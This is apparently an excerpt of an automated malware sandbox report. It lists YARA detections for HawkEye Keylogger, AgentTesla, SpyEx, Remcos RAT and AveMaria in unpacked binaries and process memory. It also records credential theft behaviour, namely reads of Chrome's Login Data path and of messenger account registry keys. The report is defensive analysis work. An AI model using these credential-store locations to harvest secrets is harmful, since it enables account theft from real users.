                    Source: Yara matchFile source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14909265.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41ce65.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a28e2d.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b49c0d.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.375b065.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4979c0d.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000031.00000000.893007539.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000031.00000000.895292691.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000031.00000002.917974713.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000031.00000000.895819817.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookiesShow sources
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_00409F29
                    Tries to steal Instant Messenger accounts or passwordsShow sources
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bin.exe PID: 7116, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bin.exe PID: 6472, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED

                    Remote Access Functionality:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 41.2.4.exe.62cbd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.415058.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.1.4.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 38.2.4.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.23c0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.415058.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.62cbd0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.415058.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 38.2.4.exe.147b1458.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.23c0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.38d3258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.798585509.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.939895279.00000000023C0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.797295676.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.943516760.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000001.801556734.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.940107209.0000000002522000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.804765191.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.932861331.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
                    Yara detected SpyEx stealerShow sources
                    Source: Yara matchFile source: 39.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.21.exe.14770000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.2.21.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.1.21.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000027.00000002.930302567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.789916886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.785901828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.791751960.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.796886573.0000000014770000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.787824676.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000001.793855505.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Yara detected Remcos RATShow sources
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.745207581.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.701188305.000000000065A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746741703.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.935198741.000000000064A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.730677212.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.740936585.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746856576.0000000000497000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rem9090sta.exe PID: 7136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPED
                    Yara detected AveMaria stealerShow sources
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
